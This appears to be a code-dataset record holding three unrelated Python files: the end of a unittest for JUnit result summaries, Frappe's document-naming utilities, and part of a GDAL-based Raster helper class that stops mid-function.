'files/junit.mpi.integration.xml',
'files/junit.mpi.standalone.xml',
'files/junit.mpi.static.xml',
'files/junit.spark.integration.1.xml',
'files/junit.spark.integration.2.xml']).with_commit('example')
results = get_test_results(parsed, False)
stats = get_stats(results)
md = get_long_summary_md(stats)
self.assertEqual(md, (' 10 files 10 suites 39m 1s :stopwatch:\n'
'217 tests 208 :heavy_check_mark: 9 :zzz: 0 :x:\n'
'373 runs 333 :heavy_check_mark: 40 :zzz: 0 :x:\n'
'\n'
'Results for commit example.\n'))
def test_file_without_cases(self):
parsed = parse_junit_xml_files(['files/no-cases.xml']).with_commit('a commit sha')
results = get_test_results(parsed, False)
stats = get_stats(results)
md = get_long_summary_md(stats)
self.assertEqual(md, ('1 files 1 suites 0s :stopwatch:\n'
'0 tests 0 :heavy_check_mark: 0 :zzz: 0 :x:\n'
'\n'
'Results for commit a commit.\n'))
def test_non_parsable_file(self):
parsed = parse_junit_xml_files(['files/empty.xml']).with_commit('a commit sha')
results = get_test_results(parsed, False)
stats = get_stats(results)
md = get_long_summary_md(stats)
self.assertEqual(md, ('1 files 1 errors 0 suites 0s :stopwatch:\n'
'0 tests 0 :heavy_check_mark: 0 :zzz: 0 :x:\n'
'\n'
'Results for commit a commit.\n'))
if __name__ == '__main__':
unittest.main()
|
py | 1a3f90da3746c2453e41bab59b5bd66999ee8353 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import now_datetime, cint, cstr
import re
from six import string_types
from frappe.model import log_types
def set_new_name(doc):
"""
Sets the `name` property for the document based on various rules.
1. If amended doc, set suffix.
2. If `autoname` method is declared, then call it.
3. If `autoname` property is set in the DocType (`meta`), then build it using the `autoname` property.
4. If no rule defined, use hash.
:param doc: Document to be named.
"""
doc.run_method("before_naming")
autoname = frappe.get_meta(doc.doctype).autoname or ""
if autoname.lower() != "prompt" and not frappe.flags.in_import:
doc.name = None
if getattr(doc, "amended_from", None):
_set_amended_name(doc)
return
elif getattr(doc.meta, "issingle", False):
doc.name = doc.doctype
elif getattr(doc.meta, "istable", False):
doc.name = make_autoname("hash", doc.doctype)
if not doc.name:
set_naming_from_document_naming_rule(doc)
if not doc.name:
doc.run_method("autoname")
if not doc.name and autoname:
set_name_from_naming_options(autoname, doc)
# if the autoname option is 'field:' and no name was derived, we need to
# notify
if not doc.name and autoname.startswith("field:"):
fieldname = autoname[6:]
frappe.throw(_("{0} is required").format(doc.meta.get_label(fieldname)))
# at this point, we fall back to name generation with the hash option
if not doc.name and autoname == "hash":
doc.name = make_autoname("hash", doc.doctype)
if not doc.name:
doc.name = make_autoname("hash", doc.doctype)
doc.name = validate_name(
doc.doctype,
doc.name,
frappe.get_meta(doc.doctype).get_field("name_case")
)
def set_name_from_naming_options(autoname, doc):
"""
Get a name based on the autoname field option
"""
_autoname = autoname.lower()
if _autoname.startswith("field:"):
doc.name = _field_autoname(autoname, doc)
elif _autoname.startswith("naming_series:"):
set_name_by_naming_series(doc)
elif _autoname.startswith("prompt"):
_prompt_autoname(autoname, doc)
elif _autoname.startswith("format:"):
doc.name = _format_autoname(autoname, doc)
elif "#" in autoname:
doc.name = make_autoname(autoname, doc=doc)
def set_naming_from_document_naming_rule(doc):
'''
Evaluate rules based on "Document Naming Series" doctype
'''
if doc.doctype in log_types:
return
# ignore_ddl if naming is not yet bootstrapped
for d in frappe.get_all('Document Naming Rule',
dict(document_type=doc.doctype, disabled=0), order_by='priority desc', ignore_ddl=True):
frappe.get_cached_doc('Document Naming Rule', d.name).apply(doc)
if doc.name:
break
def set_name_by_naming_series(doc):
"""Sets name by the `naming_series` property"""
if not doc.naming_series:
doc.naming_series = get_default_naming_series(doc.doctype)
if not doc.naming_series:
frappe.throw(frappe._("Naming Series mandatory"))
doc.name = make_autoname(doc.naming_series+".#####", "", doc)
def make_autoname(key="", doctype="", doc=""):
"""
Creates an autoname from the given key:
**Autoname rules:**
* The key is separated by '.'
* '####' represents a series. The string before this part becomes the prefix:
Example: ABC.#### creates a series ABC0001, ABC0002 etc
* 'MM' represents the current month
* 'YY' and 'YYYY' represent the current year
*Example:*
* DE./.YY./.MM./.#### will create a series like
DE/09/01/0001 where 09 is the year, 01 is the month and 0001 is the series
"""
if key == "hash":
return frappe.generate_hash(doctype, 10)
if "#" not in key:
key = key + ".#####"
elif "." not in key:
error_message = _("Invalid naming series (. missing)")
if doctype:
error_message = _("Invalid naming series (. missing) for {0}").format(doctype)
frappe.throw(error_message)
parts = key.split('.')
n = parse_naming_series(parts, doctype, doc)
return n
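# Illustrative walkthrough (comments only, not part of the original API): how a typical
# series key expands, assuming today is 2021-01-15 and the `tabSeries` row for the
# prefix "INV-21-01-" currently holds 41 (both values are hypothetical).
#
#   make_autoname("INV-.YY.-.MM.-.#####")
#     parts -> ['INV-', 'YY', '-', 'MM', '-', '#####']
#     'YY' -> '21', 'MM' -> '01', literal parts pass through unchanged
#     '#####' -> getseries('INV-21-01-', 5) bumps the counter to 42 -> '00042'
#     result -> 'INV-21-01-00042'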
def parse_naming_series(parts, doctype='', doc=''):
n = ''
if isinstance(parts, string_types):
parts = parts.split('.')
series_set = False
today = now_datetime()
for e in parts:
part = ''
if e.startswith('#'):
if not series_set:
digits = len(e)
part = getseries(n, digits)
series_set = True
elif e == 'YY':
part = today.strftime('%y')
elif e == 'MM':
part = today.strftime('%m')
elif e == 'DD':
part = today.strftime("%d")
elif e == 'YYYY':
part = today.strftime('%Y')
elif e == 'timestamp':
part = str(today)
elif e == 'FY':
part = frappe.defaults.get_user_default("fiscal_year")
elif e.startswith('{') and doc:
e = e.replace('{', '').replace('}', '')
part = doc.get(e)
elif doc and doc.get(e):
part = doc.get(e)
else:
part = e
if isinstance(part, string_types):
n += part
return n
def getseries(key, digits):
# series created ?
current = frappe.db.sql("SELECT `current` FROM `tabSeries` WHERE `name`=%s FOR UPDATE", (key,))
if current and current[0][0] is not None:
current = current[0][0]
# yes, update it
frappe.db.sql("UPDATE `tabSeries` SET `current` = `current` + 1 WHERE `name`=%s", (key,))
current = cint(current) + 1
else:
# no, create it
frappe.db.sql("INSERT INTO `tabSeries` (`name`, `current`) VALUES (%s, 1)", (key,))
current = 1
return ('%0'+str(digits)+'d') % current
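# Sketch of the counter behaviour with hypothetical values: if `tabSeries` has no row
# named 'PO-', getseries('PO-', 4) inserts one and returns '0001'; the next call finds
# current=1, bumps it to 2 and returns '0002'. The zero padding comes solely from
# `digits`, i.e. ('%04d' % 2) == '0002'.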
def revert_series_if_last(key, name, doc=None):
if ".#" in key:
prefix, hashes = key.rsplit(".", 1)
if "#" not in hashes:
return
else:
prefix = key
if '.' in prefix:
prefix = parse_naming_series(prefix.split('.'), doc=doc)
count = cint(name.replace(prefix, ""))
current = frappe.db.sql("SELECT `current` FROM `tabSeries` WHERE `name`=%s FOR UPDATE", (prefix,))
if current and current[0][0]==count:
frappe.db.sql("UPDATE `tabSeries` SET `current` = `current` - 1 WHERE `name`=%s", prefix)
def get_default_naming_series(doctype):
"""get default value for `naming_series` property"""
naming_series = frappe.get_meta(doctype).get_field("naming_series").options or ""
if naming_series:
naming_series = naming_series.split("\n")
return naming_series[0] or naming_series[1]
else:
return None
def validate_name(doctype, name, case=None, merge=False):
if not name:
frappe.throw(_("No Name Specified for {0}").format(doctype))
if name.startswith("New "+doctype):
frappe.throw(_("There were some errors setting the name, please contact the administrator"), frappe.NameError)
if case == "Title Case":
name = name.title()
if case == "UPPER CASE":
name = name.upper()
name = name.strip()
if not frappe.get_meta(doctype).get("issingle") and (doctype == name) and (name != "DocType"):
frappe.throw(_("Name of {0} cannot be {1}").format(doctype, name), frappe.NameError)
special_characters = "<>"
if re.findall("[{0}]+".format(special_characters), name):
message = ", ".join("'{0}'".format(c) for c in special_characters)
frappe.throw(_("Name cannot contain special characters like {0}").format(message), frappe.NameError)
return name
def append_number_if_name_exists(doctype, value, fieldname="name", separator="-", filters=None):
if not filters:
filters = dict()
filters.update({fieldname: value})
exists = frappe.db.exists(doctype, filters)
regex = "^{value}{separator}\d+$".format(value=re.escape(value), separator=separator)
if exists:
last = frappe.db.sql("""SELECT `{fieldname}` FROM `tab{doctype}`
WHERE `{fieldname}` {regex_character} %s
ORDER BY length({fieldname}) DESC,
`{fieldname}` DESC LIMIT 1""".format(
doctype=doctype,
fieldname=fieldname,
regex_character=frappe.db.REGEX_CHARACTER),
regex)
if last:
count = str(cint(last[0][0].rsplit(separator, 1)[1]) + 1)
else:
count = "1"
value = "{0}{1}{2}".format(value, separator, count)
return value
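# Hypothetical example: with existing names 'Task', 'Task-1' and 'Task-2' in a doctype,
# append_number_if_name_exists(doctype, 'Task') returns 'Task-3'; if no document named
# exactly 'Task' exists, the value is returned unchanged.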
def _set_amended_name(doc):
am_id = 1
am_prefix = doc.amended_from
if frappe.db.get_value(doc.doctype, doc.amended_from, "amended_from"):
am_id = cint(doc.amended_from.split("-")[-1]) + 1
am_prefix = "-".join(doc.amended_from.split("-")[:-1]) # except the last hyphen
doc.name = am_prefix + "-" + str(am_id)
return doc.name
def _field_autoname(autoname, doc, skip_slicing=None):
"""
Generate a name using `DocType` field. This is called when the doctype's
`autoname` field starts with 'field:'
"""
fieldname = autoname if skip_slicing else autoname[6:]
name = (cstr(doc.get(fieldname)) or "").strip()
return name
def _prompt_autoname(autoname, doc):
"""
Generate a name using Prompt option. This simply means the user will have to set the name manually.
This is called when the doctype's `autoname` field starts with 'prompt'.
"""
# set from __newname in save.py
if not doc.name:
frappe.throw(_("Name not set via prompt"))
def _format_autoname(autoname, doc):
"""
Generate autoname by replacing all instances of braced params (fields, date params ('DD', 'MM', 'YY'), series)
Independent of remaining string or separators.
Example pattern: 'format:LOG-{MM}-{fieldname1}-{fieldname2}-{#####}'
"""
first_colon_index = autoname.find(":")
autoname_value = autoname[first_colon_index + 1:]
def get_param_value_for_match(match):
param = match.group()
# trim braces
trimmed_param = param[1:-1]
return parse_naming_series([trimmed_param], doc=doc)
# Replace braced params with their parsed value
name = re.sub(r"(\{[\w | #]+\})", get_param_value_for_match, autoname_value)
return name
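# Hypothetical expansion: for autoname 'format:LOG-{MM}-{status}-{#####}' on a doc whose
# `status` field is 'OPEN', in January, with the relevant `tabSeries` counter at 7, the
# braced tokens become '01', 'OPEN' and '00007', giving 'LOG-01-OPEN-00007'; the literal
# 'LOG-' and '-' pieces outside the braces are left untouched.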
|
py | 1a3f91850b9a2d6a2d2ef266581f6a8366fa6d49 | # Version 1.0; Erik Husby; Polar Geospatial Center, University of Minnesota; 2017
from __future__ import division
import os
import numbers
from operator import itemgetter
import gdal, ogr, osgeo, osr
import numpy as np
PROJREF_POLAR_STEREO = """PROJCS["unnamed",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0],UNIT["degree",0.0174532925199433],AUTHORITY["EPSG","4326"]],PROJECTION["Polar_Stereographic"],PARAMETER["latitude_of_origin",-70],PARAMETER["central_meridian",0],PARAMETER["scale_factor",1],PARAMETER["false_easting",0],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]]]"""
RASTER_DEFAULT_PROJREF = PROJREF_POLAR_STEREO
gdal.UseExceptions()
class RasterIOError(Exception):
def __init__(self, msg=""):
self.msg = msg
def __str__(self):
return repr(self.msg)
class InvalidArgumentError(Exception):
def __init__(self, msg=""):
self.msg = msg
def __str__(self):
return repr(self.msg)
class Raster:
"""
*** NOTE THAT ONLY 'NORTH-UP' GEOTIFF IMAGES ARE FULLY SUPPORTED AT THIS TIME ***
Contains methods to extract pixel data, geotransform, projection, corner coordinates, geometry,
and other associated information from a raster image, built on the framework provided by GDAL's
GDALDataset class.
Additionally, 'smart' getter and setter methods are provided for all data members listed in the
class initialization (data members are referred to as a raster's 'parameters' hereafter) that
make it possible to store and modify the values of useful parameters while maintaining a
self-consistent dataset.
A Raster instance starts with all parameters set to None, except for those whose names are
provided to the initialization call as additional arguments beyond the first.
As for the first argument, if it is a path to a valid raster file (or equivalently, if it is an
osgeo.gdal.Dataset object), all values of those parameters which are to be set will be extracted
directly from the provided raster dataset. If 'ds' is not included in that list (or equivalently,
'all' and 'no-ds' are included), the class will not keep a reference to the raster dataset in
its 'ds' parameter after initialization is complete.
If the first argument is instead None, those parameters which are to be set will be set to their
respective default values (as retrieved from the getter methods mentioned later).
After initialization, setting individual parameters should be done via the Raster.set_param()
method. Since changing the value of one parameter of a raster image (such as the 'x' array of
horizontal grid coordinates) may affect the (x-)size of the image in pixel SHAPE, the RESOLUTION
of the image pixels (in the x-direction, dx), and the geographic EXTENT of the image (in its
x-coordinates), to maintain a self-consistent dataset any modifications should be propagated to
those parameters that are based on the same core values of SHAPE, RESOLUTION, or EXTENT.
This is done by default, but may be turned off by passing the 'prop' keyword argument as False.
Core values for each property -- SHAPE ('shape'), RESOLUTION ('dx', 'dy', 'res', the dx and dy
parts of 'geo_trans'), EXTENT (the xmin and ymax parts of 'geo_trans') -- may be set (remember,
every parameter is initialized to None unless specifically set) automatically by passing the
'set_core' keyword argument as True when using Raster.set_param() to set a higher-level
(non-core) parameter.
Furthermore...
When setting a parameter that directly sets a value(s) in only one of the three Raster property
domains SHAPE, RESOLUTION, or EXTENT, it must be determined which of the other two properties
will be held constant (or as close as possible to constant in the case of changing SHAPE/EXTENT
when RESOLUTION is held constant). By default, EXTENT is preserved when setting SHAPE/RESOLUTION
and RESOLUTION is preserved when setting EXTENT. This behavior may be changed when setting any
applicable parameter by passing the 'hold' keyword argument as the name of the property you wish
to preserve ('shape', 'res', or 'extent').
Setting a parameter with Raster.set_param() in 'default mode' (by passing None as the 'value'
argument with the 'set_default' keyword argument set to True) will attempt to use the values of
other already-set parameters to determine a value for the new parameter. This is done to try to
keep the Raster in a self-consistent state. Getter methods for each parameter work to accomplish
this task, and may be used by themselves to extract wanted information from the Raster without
setting any unneeded parameters.
NOTE: These getter methods will give no warning if there are inconsistencies among the parameter
values, and should be used at the programmer's own risk.
Since no copying is done when setting parameters to values that are mutable objects, multiple
references may exist in a program that point to the value of a Raster parameter and one must be
careful. However, since it is highly beneficial to be able to make direct modifications to such
items (without copying, modifying, and passing the result into Raster.set_param() over and over),
calling Raster.prop_param() after making direct modifications to the value of a parameter will
essentially propagate those changes to other parameters in the Raster by forcing the getter
methods to ignore the modified parameter when looking for values that should be held constant
through the propagation.
At this time, changes are not propagated through to the pixel data parameter 'z' after z is set.
"""
def __init__(self, rasterFile_or_ds=None, *set_params):
self.ds = None
self.shape = None
self.z = None
self.x = None
self.y = None
self.dx = None
self.dy = None
self.res = None
self.geo_trans = None
self.corner_coords = None
self.proj_ref = None
self.spat_ref = None
self.geom = None
set_params_unique = list(set(set_params))
if 'all' in set_params_unique:
set_params_unique = ['ds', 'shape', 'z', 'x', 'y', 'dx', 'dy', 'res',
'geo_trans', 'corner_coords', 'proj_ref', 'spat_ref', 'geom']
if 'no-ds' in set_params:
if 'ds' in set_params_unique:
set_params_unique.remove('ds')
if 'no-ds' in set_params_unique:
set_params_unique.remove('no-ds')
if rasterFile_or_ds is not None:
self.set_param('ds', self.open_ds(rasterFile_or_ds))
if set_params_unique:
self.extract_and_set(*set_params_unique)
if 'ds' not in set_params_unique:
self.ds = None
elif set_params_unique:
if 'ds' in set_params_unique:
raise InvalidArgumentError("`ds` parameter cannot be set when `rasterFile_or_ds`"
" argument is None")
self.set_params(*set_params_unique)
@staticmethod
def open_ds(rasterFile_or_ds):
ds = None
if isinstance(rasterFile_or_ds, str):
if not os.path.isfile(rasterFile_or_ds):
raise RasterIOError("No such `rasterFile`: '{}'".format(rasterFile_or_ds))
ds = gdal.Open(rasterFile_or_ds, gdal.GA_ReadOnly)
elif type(rasterFile_or_ds) == osgeo.gdal.Dataset:
ds = rasterFile_or_ds
else:
raise InvalidArgumentError("Invalid input type for `rasterFile_or_ds`: {}".format(
type(rasterFile_or_ds)))
return ds
def extract_z(self):
return self.ds.GetRasterBand(1).ReadAsArray() if self.ds is not None else None
def extract_shape(self):
return (self.ds.RasterYSize, self.ds.RasterXSize) if self.ds is not None else None
def extract_geo_trans(self):
return np.array(self.ds.GetGeoTransform()) if self.ds is not None else None
def extract_proj_ref(self):
return self.ds.GetProjectionRef() if self.ds is not None else None
def wkt(self, corner_coords=None):
if corner_coords is None:
corner_coords = self.get_corner_coords()
return 'POLYGON (({}))'.format(
','.join([" ".join([str(c) for c in cc]) for cc in corner_coords])
)
def wkt_to_coords(self, wkt):
eval_str = 'np.array({})'.format(
wkt.replace('POLYGON ','').replace('(','[').replace(')',']').replace(',','],[').replace(' ',',')
)
return eval(eval_str)
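    # Round-trip sketch with a hypothetical 1x1 extent: wkt() turns the corner array
    #   [[0, 1], [1, 1], [1, 0], [0, 0], [0, 1]]
    # into 'POLYGON ((0 1,1 1,1 0,0 0,0 1))', and wkt_to_coords() rebuilds the same
    # (5, 2) numpy array from that string by rewriting it into a nested list literal.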
def extract_param(self, pname):
if self.ds is None:
raise RasterIOError("Raster must have a raster dataset reference in its 'ds'"
" data member before parameters may be extracted")
pname = pname.lower()
value = None
if pname in ('shape', 'x', 'y', 'corner_coords'):
shape = self.extract_shape()
if pname in ('x', 'y', 'dx', 'dy', 'res', 'geo_trans', 'corner_coords'):
geo_trans = self.extract_geo_trans()
if pname in ('proj_ref', 'spat_ref'):
proj_ref = self.extract_proj_ref()
if pname == 'ds':
value = self.ds
elif pname == 'shape':
value = shape
elif pname == 'z':
value = self.extract_z()
elif pname == 'x':
value = geo_trans[0] + np.arange(shape[1]) * geo_trans[1]
elif pname == 'y':
value = geo_trans[3] + np.arange(shape[0]) * geo_trans[5]
elif pname == 'dx':
value = abs(geo_trans[1])
elif pname == 'dy':
value = abs(geo_trans[5])
elif pname == 'res':
value = abs(geo_trans[1]) if abs(geo_trans[1]) == abs(geo_trans[5]) else np.nan
elif pname == 'geo_trans':
value = geo_trans
elif pname == 'corner_coords':
value = self.get_corner_coords(geo_trans, shape)
elif pname == 'proj_ref':
value = proj_ref
elif pname == 'spat_ref':
value = osr.SpatialReference(proj_ref) if proj_ref is not None else None
elif pname == 'geom':
value = ogr.Geometry(wkt=self.wkt(self.extract_param('corner_coords')))
elif pname == 'geom_sr':
value = self.extract_param('geom')
spat_ref = self.extract_param('spat_ref')
if spat_ref is not None:
value.AssignSpatialReference(spat_ref)
else:
print("WARNING: Spatial reference could not be extracted from raster dataset,"
" so extracted geometry has not been assigned a spatial reference.")
else:
raise InvalidArgumentError("Invalid parameter for extraction: {}".format(pname))
return value
def extract_params(self, *params):
if self.ds is None:
raise RasterIOError("Raster must have a raster dataset reference in its 'ds'"
" data member before parameters may be extracted")
pset = set(params)
valid_pnames = vars(self).keys()
valid_pnames.append('geom_sr')
invalid_pnames = pset.difference(set(valid_pnames))
if invalid_pnames:
raise InvalidArgumentError("Invalid parameter(s) for extraction: {}".format(invalid_pnames))
if pset.intersection({'shape', 'x', 'y', 'corner_coords', 'geom', 'geom_sr'}):
shape = self.extract_shape()
if pset.intersection({'x', 'y', 'dx', 'dy', 'res', 'geo_trans', 'corner_coords', 'geom', 'geom_sr'}):
geo_trans = self.extract_geo_trans()
if pset.intersection({'proj_ref', 'spat_ref', 'geom_sr'}):
proj_ref = self.extract_proj_ref()
if pset.intersection({'corner_coords', 'geom', 'geom_sr'}):
corner_coords = self.get_corner_coords(geo_trans, shape)
if pset.intersection({'spat_ref', 'geom_sr'}):
spat_ref = osr.SpatialReference(proj_ref) if proj_ref is not None else None
if pset.intersection({'geom', 'geom_sr'}):
geom = ogr.Geometry(wkt=self.wkt(corner_coords))
value_list = []
for pname in params:
pname = pname.lower()
value = None
if pname == 'ds':
value = self.ds
elif pname == 'shape':
value = shape
elif pname == 'z':
value = self.extract_z()
elif pname == 'x':
value = geo_trans[0] + np.arange(shape[1]) * geo_trans[1]
elif pname == 'y':
value = geo_trans[3] + np.arange(shape[0]) * geo_trans[5]
elif pname == 'dx':
value = abs(geo_trans[1])
elif pname == 'dy':
value = abs(geo_trans[5])
elif pname == 'res':
value = abs(geo_trans[1]) if abs(geo_trans[1]) == abs(geo_trans[5]) else np.nan
elif pname == 'geo_trans':
value = geo_trans
elif pname == 'corner_coords':
value = corner_coords
elif pname == 'proj_ref':
value = proj_ref
elif pname == 'spat_ref':
value = spat_ref
elif pname == 'geom':
value = geom
elif pname == 'geom_sr':
value = geom.Clone() if 'geom' in params else geom
if spat_ref is not None:
value.AssignSpatialReference(spat_ref)
else:
print("WARNING: Spatial reference could not be extracted from raster dataset,"
" so extracted geometry has not been assigned a spatial reference.")
value_list.append(value)
return value_list
def set_params(self, *params):
set_core = False
params_copy = params
if 'all' in params:
params_copy = ('z', 'x', 'y', 'corner_coords', 'spat_ref', 'geom')
set_core = True
params_copy = tuple(set(params_copy))
for p in params_copy:
self.set_param(p, set_core=set_core)
def set_params_and_values(self, *pname_value):
pnames = list(pname_value[0::2])
values = pname_value[1::2]
if len(pnames) != len(values):
raise InvalidArgumentError("Unequal number of parameter names and parameter values")
valid_parameters = vars(self).keys()
for i in range(len(pnames)):
p = pnames[i]
if isinstance(p, str):
if p in valid_parameters:
continue
elif p == 'geom_sr':
pnames[i] = 'geom'
continue
raise InvalidArgumentError("Starting with the first argument, every other argument "
"must be a valid string name of a Raster parameter")
for i in range(len(pnames)):
exec('self.{} = values[{}]'.format(pnames[i], i))
def extract_and_set(self, *params):
self.set_params_and_values(*[a for b in zip(params, self.extract_params(*params)) for a in b])
def clear_params(self):
params = vars(self).keys()
params.remove('ds')
for p in params:
exec('self.{} = None'.format(p))
def get_shape(self, caller_function=None):
if self.shape is not None:
return self.shape
elif self.z is not None:
return self.z.shape
elif caller_function == 'get_res':
return None
xsize, ysize = None, None
if self.x is not None:
xsize = len(self.x)
if self.y is not None:
ysize = len(self.y)
if (xsize is None or ysize is None) and self.corner_coords is not None:
if xsize is None:
dx = self.get_res('dx', 'get_shape')
if not np.isnan(dx):
cc_x = self.corner_coords[:, 0]
if cc_x[2] is not None and cc_x[0] is not None:
xsize = (cc_x[2] - cc_x[0]) / dx
if ysize is None:
dy = self.get_res('dy', 'get_shape')
if not np.isnan(dy):
cc_y = self.corner_coords[:, 1]
if cc_y[2] is not None and cc_y[0] is not None:
ysize = -(cc_y[2] - cc_y[0]) / dy
if xsize is None:
xsize = 0
if ysize is None:
ysize = 0
return ysize, xsize
def get_res(self, param='res', caller_function=None):
if param not in ('dx', 'dy', 'res'):
raise InvalidArgumentError("Invalid `param` argument: {}".format(param))
value = eval('self.{}'.format(param))
if value is not None:
return value
if param in ('dx', 'dy'):
if self.res is not None and not np.isnan(self.res):
value = self.res
elif param == 'dx':
if self.geo_trans is not None:
value = self.geo_trans[1]
elif self.corner_coords is not None and caller_function != 'get_shape':
cc_x = self.corner_coords[:, 0]
shape = self.get_shape('get_res')
if shape is not None:
xsize = shape[1]
value = np.nan if xsize == 0 else (cc_x[2] - cc_x[0]) / xsize
elif self.x is not None:
value = (self.x[1] - self.x[0]) if len(self.x) > 1 else np.nan
elif param == 'dy':
if self.geo_trans is not None:
value = -self.geo_trans[5]
elif self.corner_coords is not None and caller_function != 'get_shape':
cc_y = self.corner_coords[:, 1]
shape = self.get_shape('get_res')
if shape is not None:
ysize = shape[0]
value = np.nan if ysize == 0 else -(cc_y[2] - cc_y[0]) / ysize
elif self.y is not None:
value = (self.y[0] - self.y[1]) if len(self.y) > 1 else np.nan
elif param == 'res':
dx = self.get_res('dx')
dy = self.get_res('dy')
value = dx if dx == dy else np.nan
if value is None:
value = np.nan
return value
def get_xmin_ymax(self):
xmin, ymax = None, None
if self.geo_trans is not None:
xmin, ymax = itemgetter(0, 3)(self.geo_trans)
elif self.corner_coords is not None:
xmin, ymax = self.corner_coords[0]
else:
if self.geom is not None:
corner_coords = self.wkt_to_coords(self.geom.ExportToWkt())
if corner_coords.shape[0] == 5:
xmin, ymax = corner_coords[0]
if xmin is None or ymax is None:
xmin = self.x[0] if (self.x is not None and len(self.x) > 0) else np.nan
ymax = self.y[0] if (self.y is not None and len(self.y) > 0) else np.nan
return np.array([xmin, ymax])
def get_xmax_ymin(self):
xmax, ymin = None, None
if self.corner_coords is not None:
xmax, ymin = self.corner_coords[2]
else:
if self.geom is not None:
corner_coords = self.wkt_to_coords(self.geom.ExportToWkt())
if corner_coords.shape[0] == 5:
xmax, ymin = corner_coords[2]
if xmax is None or ymin is None:
dx = self.get_res('dx')
dy = self.get_res('dy')
xmax = (self.x[-1] + dx) if (self.x is not None and len(self.x) > 0) else np.nan
ymin = (self.y[-1] - dy) if (self.y is not None and len(self.y) > 0) else np.nan
if np.isnan(xmax) or np.isnan(ymin):
xmin, ymax = self.get_xmin_ymax()
ysize, xsize = self.get_shape()
if np.isnan(xmax):
xmax = xmin + xsize*dx
if np.isnan(ymin):
ymin = ymax - ysize*dy
return np.array([xmax, ymin])
def get_x(self, xmin=None, xsize=None, dx=None):
if self.x is not None \
and (xmin is None and xsize is None and dx is None):
return self.x
else:
if xmin is None:
xmin = self.get_xmin_ymax()[0]
if xsize is None:
xsize = self.get_shape()[1]
if dx is None:
dx = self.get_res('dx')
x = xmin + np.arange(xsize)*dx
if xsize > 0:
x[0] = xmin
return x
def get_y(self, ymax=None, ysize=None, dy=None):
if self.y is not None \
and (ymax is None and ysize is None and dy is None):
return self.y
else:
if ymax is None:
ymax = self.get_xmin_ymax()[1]
if ysize is None:
ysize = self.get_shape()[0]
if dy is None:
dy = self.get_res('dy')
y = ymax - np.arange(ysize)*dy
if ysize > 0:
y[0] = ymax
return y
def get_geo_trans(self):
if self.geo_trans is not None:
return self.geo_trans
else:
xmin, ymax = self.get_xmin_ymax()
dx = self.get_res('dx')
dy = self.get_res('dy')
rot1, rot2 = 0, 0
geo_trans = np.array([
xmin,
dx,
rot1,
ymax,
rot2,
-dy
]).astype(float)
return geo_trans
def get_corner_coords(self, geo_trans=None, shape=None):
if geo_trans is None and self.corner_coords is not None:
return self.corner_coords
else:
if geo_trans is None and self.geom is not None:
corner_coords = self.wkt_to_coords(self.geom.ExportToWkt())
if corner_coords.shape[0] == 5:
return corner_coords
gt = geo_trans if geo_trans is not None else self.geo_trans
if gt is not None and (geo_trans is not None or (gt[2] != 0 or gt[4] != 0)):
top_left_x = np.full((5, 1), gt[0])
top_left_y = np.full((5, 1), gt[3])
top_left_mat = np.concatenate((top_left_x, top_left_y), axis=1)
ysize, xsize = shape if shape is not None else self.get_shape()
raster_XY_size_mat = np.array([
[0, 0],
[xsize, 0],
[xsize, ysize],
[0, ysize],
[0, 0]
])
gt_mat = np.array([
[gt[1], gt[4]],
[gt[2], gt[5]]
])
return top_left_mat + np.dot(raster_XY_size_mat, gt_mat)
else:
xmin, ymax = self.get_xmin_ymax()
xmax, ymin = self.get_xmax_ymin()
corner_coords = np.array([
[xmin, ymax],
[xmax, ymax],
[xmax, ymin],
[xmin, ymin],
[xmin, ymax]
])
return corner_coords
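    # Worked example with a hypothetical north-up geotransform: for
    #   geo_trans = [500000, 2, 0, 7500000, 0, -2]  and  shape = (100, 200),
    # the corner math reduces to x0 + ncols*dx and y0 - nrows*dy, so the returned ring is
    # (500000, 7500000), (500400, 7500000), (500400, 7499800), (500000, 7499800) and back
    # to (500000, 7500000).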
def get_proj_ref(self):
if self.proj_ref is not None:
return self.proj_ref
else:
proj_ref = None
spat_ref = self.spat_ref
if spat_ref is None and self.geom is not None:
spat_ref = self.geom.GetSpatialReference()
if spat_ref is not None:
proj_ref = spat_ref.ExportToWkt()
return proj_ref
def get_spat_ref(self):
if self.spat_ref is not None:
return self.spat_ref
else:
spat_ref = None
if self.proj_ref is not None:
spat_ref = osr.SpatialReference(self.proj_ref)
elif self.geom is not None:
spat_ref = self.geom.GetSpatialReference()
return spat_ref
def get_geom(self):
if self.geom is not None:
return self.geom
else:
geom_cc = self.get_corner_coords()
if np.any(np.isnan(geom_cc)):
geom_cc = np.array([[0, 0]])
geom = ogr.Geometry(wkt=self.wkt(geom_cc))
spat_ref = self.spat_ref
if spat_ref is None and self.proj_ref is not None:
spat_ref = osr.SpatialReference(self.proj_ref)
if spat_ref is not None:
geom.AssignSpatialReference(spat_ref)
return geom
def set_shape(self, shape, hold, set_core=True):
if type(shape) not in (tuple, list) or len(shape) != 2 \
or False in [(type(n) in (int, long) and n >= 0) for n in shape]:
raise InvalidArgumentError("`shape` must be a numeric tuple or list of length 2")
if hold != 'off':
new_ysize, new_xsize = shape
xmin, ymax = self.get_xmin_ymax()
dx = None
dy = None
if hold == 'res':
dx = self.get_res('dx')
dy = self.get_res('dy')
self.set_extent((xmin, ymax), (xmin + new_xsize*dx, ymax - new_ysize*dy), 'off', False)
elif hold == 'extent':
xmax, ymin = self.get_xmax_ymin()
new_dx = (xmax-xmin)/new_xsize
new_dy = (ymax-ymin)/new_ysize
self.set_res('dx', new_dx, 'off', False)
self.set_res('dy', new_dy, 'off', False)
dx, dy = new_dx, new_dy
else:
raise InvalidArgumentError("Invalid `hold` argument: {}".format(hold))
if self.x is not None and new_xsize != len(self.x):
self.set_param('x', self.get_x(xmin, new_xsize, dx), False)
if self.y is not None and new_ysize != len(self.y):
self.set_param('y', self.get_y(ymax, new_ysize, dy), False)
if self.shape is not None or set_core:
self.shape = shape
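    # Hypothetical illustration of the two hold modes: for a raster spanning x = 0..100
    # with dx = 1 (100 columns), set_shape((nrows, 50), 'extent') keeps the 0..100 extent
    # and doubles dx to 2.0, while set_shape((nrows, 50), 'res') keeps dx = 1 and pulls
    # the x extent in to 0..50.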
def set_res(self, pname, res, hold, set_core=True, skip_gt=False):
if pname not in ('dx', 'dy', 'res'):
